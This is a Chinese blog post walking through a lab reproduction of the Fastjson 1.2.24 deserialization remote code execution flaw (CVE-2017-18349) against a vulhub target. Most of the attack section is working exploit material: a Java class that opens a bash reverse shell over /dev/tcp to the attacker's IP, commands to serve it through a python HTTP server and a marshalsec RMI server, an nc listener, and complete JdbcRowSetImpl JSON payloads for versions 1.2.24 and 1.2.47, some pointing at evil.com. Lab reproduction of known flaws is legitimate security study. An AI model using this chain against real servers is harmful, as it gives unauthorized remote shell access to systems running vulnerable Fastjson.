Fastjson 1.2.24 反序列化(CVE-2017-18349)漏洞复现

最新推荐文章于 2024-05-30 14:49:13 发布
最新推荐文章于 2024-05-30 14:49:13 发布
阅读量1.5k 收藏 4
点赞数
分类专栏: 安全漏洞 渗透测试 渗透实验 文章标签: 安全 安全漏洞 渗透测试 web安全 fastjson
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/HEAVEN569/article/details/125390348
版权

Fastjson 1.2.24 反序列化(CVE-2017-18349)漏洞复现

1、漏洞描述

fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。

影响版本

Fastjson1.2.24以及之前的版本

2、环境搭建

vulhub靶机下载地址:https://github.com/vulhub/vulhub

靶机搭建在cenos7中ip:192.168.199.52,攻击机使用kali,ip:192.168.199.51。

开启靶机:

cd vulhub-master/fastjson/1.2.24-rce/
docker-compose up -d

web地址:http://ip:8090/

3、漏洞检测

1、看见有json的请求包,就可以输入一串错误的json区请求测试

返回包的报错中有:com.alibaba.fastjson.JSONException:

2、如果没有报错回显,利用dnslog进行回显

{"test":{"@type":"java.net.Inet4Address","val":"dnslog的地址"}}

4、漏洞复现

复现流程

1.访问http://ip:8090/

2.使用burp抓包

使用burp抓包修改post提交方式并且添加内容:{"@type":"java.lang.AutoCloseable"

最后返回包中显示失败

3.新建TouchFile.java然后使用javac 命令对TouchFile.java文件进行编译。(javac TouchFile.java)

import java.lang.Runtime;
import java.lang.Process;
public class TouchFile {
 static {
      try {
             Runtime r = Runtime.getRuntime();
             Process p = r.exec(new String[]{"/bin/bash","-c","bash -i >& /dev/tcp/192.168.199.51/4444 0>&1"});
             p.waitFor();
       } catch (Exception e) {
           // do nothing
       }
   }
}

4在kali 中使用python开启http服务

在kali中创建一个test文件夹,然后把前面创建的TouchFile.java文件移到该目录下,然后在该目录下使用python开启http服务

mkdir test
mv TouchFile.class test/
python3 -m http.server 1234

5.使用marshalsec-0.0.3-SNAPSHOT-all.jar

marshalsec下载地址:https://github.com/RandomRobbieBF/marshalsec-jar

将该文件也移到新创的test目录下

mv marshalsec-0.0.3-SNAPSHOT-all.jar test/

然后借助marshalsec项目,启动一个RMI服务器,监听9999端口,并制定加载远程类TouchFile.class

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.199.51:1234/#TouchFile" 9999

6.在kali中使用nc开启端口监听

nc -lvvp 4444

7. 发送请求包

POST / HTTP/1.1
Host: 192.168.199.52:8090
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 164
{

    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.199.51:9999/TouchFile",
        "autoCommit":true
    }

}

请求rmi服务器是没有回显的,所以burp的response是没有内容的。

8.结果

1.2.47和1.2.24的复现过程区别

向靶场服务器发送Payload不一样,其他的过程都是一样的,1.2.47的pyload:

{

    "a":{

        "@type":"java.lang.Class",

        "val":"com.sun.rowset.JdbcRowSetImpl"

    },

    "b":{

        "@type":"com.sun.rowset.JdbcRowSetImpl",

        "dataSourceName":"rmi://evil.com:9999/Exploit",

        "autoCommit":true

 }

6、1.2.24的payload

{

    "b":{

        "@type":"com.sun.rowset.JdbcRowSetImpl",

        "dataSourceName":"rmi:// evil.com:9999/Exploit ",

        "autoCommit":true

    }

7、修复建议

将Fastjson升级到最新版本

https://github.com/alibaba/fastjson

参考链接:

https://blog.csdn.net/weixin_44146996/article/details/111860438?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522164499669816780366586530%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fall.%2522%257D&request_id=164499669816780366586530&biz_id=0&spm=1018.2226.3001.4187

声明:

本文仅限于大家技术交流和学习,严禁读者利用本博客的所有知识点进行非法操作。如果你利用文章中介绍的技术对他人造成损失,后果由您自行承担,感谢您的配合,

作者创作不容易,请大家点赞收藏支持一下。谢谢各位读者大老爷。

HEAVM
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Fastjson 1.2.24反序列化漏洞复现
m0_54899775的博客
01-16 4484
Fastjson 1.2.24反序列化漏洞复现 创建文件,反弹shell
fastjson1.2.24反序列化RCE
最新发布
06-24
fastjson1.2.24反序列化RCE
Fastjson1.2.24-RCE 漏洞复现(CVE-2017-18349)
oiadkt的博客
04-12 1040
Fastjson1.2.24-RCE 漏洞复现(CVE-2017-18349)
java代码审计之fastjson反序列化漏洞
CheatMyself的博客
05-30 925
Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。Fastjson 可以操作任何 Java 对象,即使是一些预先存在的没有源码的对象。该产品主要提供了两个接口,JSON.toJSONString和JSON.parseObject/JSON.parse分别实现序列化和反序列化
Fastjson漏洞CVE-2017-18349
GalaxySpaceX的博客
05-20 1186
Fastjson漏洞CVE-2017-18349
漏洞复现CVE-2017-18349FastJson1.2.24反序列化导致任意命令执行漏洞
weixin_42282189的博客
09-13 1875
作者: 村里的小四 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责 0x01 前言 FastJson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化JavaBean。 0x02 影响范围 影响范围:Fastjson1.2.24及之前版本。 0x03 环境准备 3.1 目标环境 3.1.1 靶场环境 vulhub靶场环境:CVE-2017-18349 3.1.2 靶机: Ubuntu2.
fastjson 1.2.24 反序列化 RCE 漏洞复现(CVE-2017-18349)
一个top2本科学渣的救赎之路
04-23 6302
fastjson 1.2.24 反序列化导致任意命令执行漏洞,可获得服务器root权限
fastjson 1.2.24反序列化漏洞复现
weixin_43227251的博客
05-07 613
简介 fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。 在Java 8u102环境下,没有com.sun.jndi.rmi.object.trustURLCodebase的限制,可以使用com.sun.rowset.JdbcRowSetImpl的利用链,借助JNDI注入来执行命令。 环境 靶机:http://192....
fastjson-c3p0:fastjson不出网回显利用
03-19
fastjson-c3p0 fastjson不出网回显利用 POST /json HTTP/1.1 Host: 127.0.0.1:8999 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Encoding: gzip, deflate cmd: dir Acce
FastJson1.2.24反序列化导致任意命令执行漏洞复现CVE-2017-18349
又菜又爱倒腾的博客
10-29 2344
#FastJson1.2.24反序列化导致任意命令执行漏洞CVE-2017-18349)# 一、漏洞简介 Pippo是一款基于JavaWeb框架。FastjsonEngine是其中的一个JSON处理引擎。Fastjson是其中的一个基于Java的JSON解析器/生成器。 Pippo 1.11.0版本中的FastjsonEngine所使用的Fastjson 1.2.25之前版本的parseObject存在安全漏洞。利用fastjson autotype在处理json对象时,未对@type字段进行安全安全
fastjsonfastjson 1.2.24 反序列化导致任意命令执行
bqnagus
10-01 857
fastjsonfastjson 1.2.24 反序列化导致任意命令执行
Fastjson 1.2.24反序列化漏洞
weixin_51151498的博客
01-04 566
Fastjson 1.2.24反序列化漏洞
利用BCEL打fastjson直接burp回显getshell
2201_75353421的博客
08-03 1368
fastjson我曾经写过漏洞的原理,但是公网遇到的漏洞越来越少,大多都是在内网的环境,内网里没办法使用dnslog去探测回显。这里学习一下用bcel链直接在bp中产生回显进而getshell。
Fastjson漏洞的识别与DNSlog回显
tpaer的博客
09-02 4672
Fastjson RCE漏洞实战POC探测方式
Fastjson反序列化
可爱的我可爱的code
11-19 1186
欢迎去我的博客查看原文:http://www.xpshuai.cn/posts/21856/ 简介 fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化JavaBean。可以通过反序列化导致远程命令执行。 漏洞检测方法 DNSLog回显 下面有多个请求,分别放到请求数据包部分(可能某个不适用, 多试几个),通过构造DNS解析来判断是否是FastjsonFastjson在解析下.
FastJson远程命令执行漏洞学习笔记
虚幻私塾
09-04 774
fastjson用于将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化JavaBean。fastjson.jar是阿里开发的一款专门用于Java开发的包,可以方便的实现json对象与JavaBean对象的转换,实现JavaBean对象与json字符串的转换,实现json对象与json字符串的转换。
Tcsec安全研究院|fastjson漏洞分析
tcsecXD的博客
02-14 1324
fastjson 是一个 Java 库,可用于将 Java 对象转换为其 JSON 表示形式。
Java安全反序列化-FastJson 1.2.24反序列化漏洞POP链分析_TemplatesImpl和JdbcRowSetImpl JNDI注入分析_marshalsec测试payload利用
Ho1aAs‘s Blog
03-06 1121
文章目录前言版本FastJson基础一、反序列化TemplatesImpl类payload代码审计 | 原理分析JSON.parse()处理byte[]JSON.parse()触发TemplatesImpl.getOutputProperties()代码复现参考完 前言 版本 FastJson <= 1.2.24 FastJson基础 『JavaFastjson基础 一、反序列化TemplatesImpl类 payload { "@type":"com.sun.org.apache.xalan
Fastjson 1.2.24 反序列化CVE-2017-18349
黑白的博客
11-23 3371
声明 好好学习,天天向上 漏洞描述 CVE-2017-18349,前台无回显RCE fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。 影响范围 fastjson<=1.2.24 复现过程 这里使用1.2.24版本 使用vulhub cd /app/vulhub-20201028/fastjson/1.2.24-rce 使用docker启动 docker-compose
fastjson 1.2.24 反序列化导致任意命令执行漏洞
03-16
fastjson 1.2.24 存在反序列化漏洞,攻击者可以利用该漏洞执行任意命令。该漏洞的原因是 fastjson反序列化时未对恶意数据进行足够的校验,导致攻击者可以构造恶意数据,使其被 fastjson 解析时执行任意命令。建议...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值